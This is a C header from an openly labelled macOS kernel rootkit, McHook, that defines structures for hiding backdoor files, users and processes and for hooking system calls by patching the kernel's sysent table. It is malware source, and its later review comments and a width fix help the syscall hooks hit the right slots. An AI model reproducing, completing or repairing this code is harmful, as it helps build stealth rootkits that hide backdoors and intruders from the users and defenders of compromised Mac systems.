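/*
 * McHook - structures.h
 * OS X KSpace Rootkit
 *
 * Created by revenge on 20/03/2009
 * Copyright (C) HT srl 2009. All rights reserved
 *
 * Shared constants, per-process bookkeeping structs and syscall-argument
 * layouts used by the kext.  The mk_*_args structs reproduce the kernel's
 * own argument-slot layout (one uint64_t-sized slot per argument, padded on
 * the unused side by PADL_/PADR_), so a hooked handler can cast the opaque
 * argument pointer it receives to the matching struct.
 */

#ifndef MCHOOK_STRUCTURES_H
#define MCHOOK_STRUCTURES_H

/* Pointer-width integer typedefs (Foundation-style names, usable in kernel code). */
#if __LP64__ || NS_BUILD_32_LIKE_64
typedef int64_t NSInteger;
typedef uint64_t NSUInteger;
#else
typedef int32_t NSInteger;
typedef uint32_t NSUInteger;
#endif

/*
 * Argument-slot padding.  Every syscall argument occupies a uint64_t-sized
 * slot; PAD_(t) is the number of filler bytes needed for a type narrower
 * than that.  On little-endian targets the filler goes to the right of the
 * value, on big-endian targets to the left.
 */
#define PAD_(t) (sizeof(uint64_t) <= sizeof(t) \
                 ? 0 : sizeof(uint64_t) - sizeof(t))

#if BYTE_ORDER == LITTLE_ENDIAN
#define PADL_(t) 0
#define PADR_(t) PAD_(t)
#else
#define PADL_(t) PAD_(t)
#define PADR_(t) 0
#endif

/*
 * BSD syscall numbers.
 * NOTE(review): these are hard-coded for the kernel release this file was
 * written against (2009).  Syscall numbers are not stable across releases;
 * verify them against the target kernel's syscall table before hooking,
 * because a stale number silently patches the wrong sysent slot.
 */
#define SYS_syscall            0
#define SYS_exit               1
#define SYS_fork               2
#define SYS_read               3
#define SYS_wait4              7
#define SYS_setuid             23
#define SYS_ptrace             26
#define SYS_kill               37
#define SYS_reboot             55
#define SYS_shutdown           134
#define SYS_getdirentries      196
#define SYS_getattrlist        220
#define SYS_getdirentriesattr  222
#define SYS_getdirentries64    344

/* Mach trap number ("tfp" presumably task_for_pid; same caveat as above). */
#define TRAP_tfp               45

/*
 * Fixed-size table limits.  Any code filling the arrays below from ioctl
 * input (not in this file) must enforce these bounds itself: path_counter
 * < MAX_PATH_ENTRIES, and every string NUL-terminated within its array.
 */
#define MAX_PATH_ENTRIES       15
#define MAX_BACKDOOR_ENTRIES   15
#define MAX_USER_SIZE          20
#define MAX_DIRNAME_SIZE       30
#define MAX_PROCNAME_SIZE      20   /* was a bare 20 in the struct below */

/* A process name that the hooks should leave alone. */
typedef struct exclusion_list {
    char processname[MAX_PROCNAME_SIZE];
    int  is_active;
} exclusion_list_t;

/*
 * Per-backdoor + username (per-pid) record holding every path the backdoor
 * needs hidden, filled in through ioctl requests.
 */
typedef struct reg_backdoors {
    char   path[MAX_PATH_ENTRIES][MAX_DIRNAME_SIZE];  /* paths to hide */
    char   username[MAX_USER_SIZE];
    int    path_counter;    /* number of valid entries in path[] */
    int    is_active;
    int    is_hidden;
    int    is_task_hidden;
    int    is_proc_hidden;
    proc_t p;               /* owning process */
} reg_backdoors_t;

/* Resolved kernel symbol: a hash of the name plus its address, per ABI width. */
typedef struct symbol_32 {
    uint32_t hash;
    uint32_t address;
} symbol32_t;

typedef struct symbol_64 {
    uint64_t hash;
    uint64_t address;
} symbol64_t;

/* Running OS version, split into its three components. */
typedef struct os_version {
    uint32_t major;
    uint32_t minor;
    uint32_t bugfix;
} os_version_t;

/* Minimal getattrlist() result buffer: total length followed by the name. */
typedef struct attribute_buffer {
    uint32_t        length;
    attrreference_t name;
} attribute_buffer_t;

/*
 * getattrlist() result buffer requesting name, object type and Finder info.
 *
 * FIX: the leading length field was `unsigned long`, which is 8 bytes under
 * __LP64__ and would shift every following field.  getattrlist() writes a
 * 32-bit length, and attribute_buffer_t above already uses uint32_t for the
 * same field; this struct now agrees with it.
 */
struct FInfoAttrBuf {
    uint32_t        length;
    attrreference_t name;
    fsobj_type_t    objType;
    char            finderInfo[32];
};
typedef struct FInfoAttrBuf FInfoAttrBuf;

/* Attribute-selection list handed to getattrlist()/getdirentriesattr(). */
typedef struct attr_list {
    u_short   bitmapcount;  /* number of attr. bit sets in list (should be 5) */
    u_int16_t reserved;     /* (to maintain 4-byte alignment) */
    u_int32_t commonattr;   /* common attribute group */
    u_int32_t volattr;      /* Volume attribute group */
    u_int32_t dirattr;      /* directory attribute group */
    u_int32_t fileattr;     /* file attribute group */
    u_int32_t forkattr;     /* fork attribute group */
} attr_list_t;

/* read(fd, cbuf, nbyte) */
struct mk_read_args {
    char fd_l_[PADL_(int)];                 int fd;             char fd_r_[PADR_(int)];
    char cbuf_l_[PADL_(user_addr_t)];       user_addr_t cbuf;   char cbuf_r_[PADR_(user_addr_t)];
    char nbyte_l_[PADL_(user_size_t)];      user_size_t nbyte;  char nbyte_r_[PADR_(user_size_t)];
};

/* getdirentries(fd, buf, count, basep) */
struct mk_getdirentries_args {
    char fd_l_[PADL_(int)];                 int fd;             char fd_r_[PADR_(int)];
    char buf_l_[PADL_(user_addr_t)];        user_addr_t buf;    char buf_r_[PADR_(user_addr_t)];
    char count_l_[PADL_(u_int)];            u_int count;        char count_r_[PADR_(u_int)];
    char basep_l_[PADL_(user_addr_t)];      user_addr_t basep;  char basep_r_[PADR_(user_addr_t)];
};

/* getdirentries64(fd, buf, bufsize, position) */
struct mk_getdirentries64_args {
    char fd_l_[PADL_(int)];                 int fd;                 char fd_r_[PADR_(int)];
    char buf_l_[PADL_(user_addr_t)];        user_addr_t buf;        char buf_r_[PADR_(user_addr_t)];
    char bufsize_l_[PADL_(user_size_t)];    user_size_t bufsize;    char bufsize_r_[PADR_(user_size_t)];
    char position_l_[PADL_(user_addr_t)];   user_addr_t position;   char position_r_[PADR_(user_addr_t)];
};

/*
 * getdirentriesattr(fd, alist, buffer, buffersize, count, basep, newstate, options)
 *
 * An alternative, unpadded form was left in the original source for a later
 * OS release (kept here for reference, still disabled):
 *
 * #if (defined(MAC_OS_X_VERSION_10_7) && MAC_OS_X_VERSION_MAX_ALLOWED >= MAC_OS_X_VERSION_10_7)
 * struct mk_getdirentriesattr_args {
 *     int fd;
 *     struct attrlist *alist;
 *     void *buffer;
 *     size_t buffersize;
 *     u_long *count;
 *     u_long *basep;
 *     u_long *newstate;
 *     u_long options;
 * };
 * #else
 */
struct mk_getdirentriesattr_args {
    char fd_l_[PADL_(int)];                     int fd;                     char fd_r_[PADR_(int)];
    char alist_l_[PADL_(user_addr_t)];          user_addr_t alist;          char alist_r_[PADR_(user_addr_t)];
    char buffer_l_[PADL_(user_addr_t)];         user_addr_t buffer;         char buffer_r_[PADR_(user_addr_t)];
    char buffersize_l_[PADL_(user_size_t)];     user_size_t buffersize;     char buffersize_r_[PADR_(user_size_t)];
    char count_l_[PADL_(user_addr_t)];          user_addr_t count;          char count_r_[PADR_(user_addr_t)];
    char basep_l_[PADL_(user_addr_t)];          user_addr_t basep;          char basep_r_[PADR_(user_addr_t)];
    char newstate_l_[PADL_(user_addr_t)];       user_addr_t newstate;       char newstate_r_[PADR_(user_addr_t)];
    char options_l_[PADL_(user_ulong_t)];       user_ulong_t options;       char options_r_[PADR_(user_ulong_t)];
};
/* #endif */

/* getattrlist(path, alist, attributeBuffer, bufferSize, options) */
struct mk_getattrlist_args {
    char path_l_[PADL_(user_addr_t)];               user_addr_t path;               char path_r_[PADR_(user_addr_t)];
    char alist_l_[PADL_(user_addr_t)];              user_addr_t alist;              char alist_r_[PADR_(user_addr_t)];
    char attributeBuffer_l_[PADL_(user_addr_t)];    user_addr_t attributeBuffer;    char attributeBuffer_r_[PADR_(user_addr_t)];
    char bufferSize_l_[PADL_(user_size_t)];         user_size_t bufferSize;         char bufferSize_r_[PADR_(user_size_t)];
    char options_l_[PADL_(user_ulong_t)];           user_ulong_t options;           char options_r_[PADR_(user_ulong_t)];
};

/* kill(pid, signum, posix) */
struct mk_kill_args {
    char pid_l_[PADL_(int)];        int pid;        char pid_r_[PADR_(int)];
    char signum_l_[PADL_(int)];     int signum;     char signum_r_[PADR_(int)];
    char posix_l_[PADL_(int)];      int posix;      char posix_r_[PADR_(int)];
};

/* Signature of a syscall implementation and of an argument munger. */
typedef int32_t sy_call_t (struct proc *, void *, int *);
typedef void sy_munge_t (const void *, void *);

/*
 * One entry of the kernel's system call table.
 * NOTE(review): the field order and widths must match the target kernel's
 * own struct sysent exactly, or sy_call will be patched at the wrong offset;
 * this layout is tied to the same kernel release as the syscall numbers above.
 */
struct sysent {
    int16_t     sy_narg;          /* number of args */
    int8_t      sy_resv;          /* reserved */
    int8_t      sy_flags;         /* flags */
    sy_call_t  *sy_call;          /* implementing function */
    sy_munge_t *sy_arg_munge32;   /* system call arguments munger for 32-bit process */
    sy_munge_t *sy_arg_munge64;   /* system call arguments munger for 64-bit process */
    int32_t     sy_return_type;   /* system call return types */
    uint16_t    sy_arg_bytes;     /* Total size of arguments in bytes for
                                   * 32-bit system calls */
};

#endif /* MCHOOK_STRUCTURES_H */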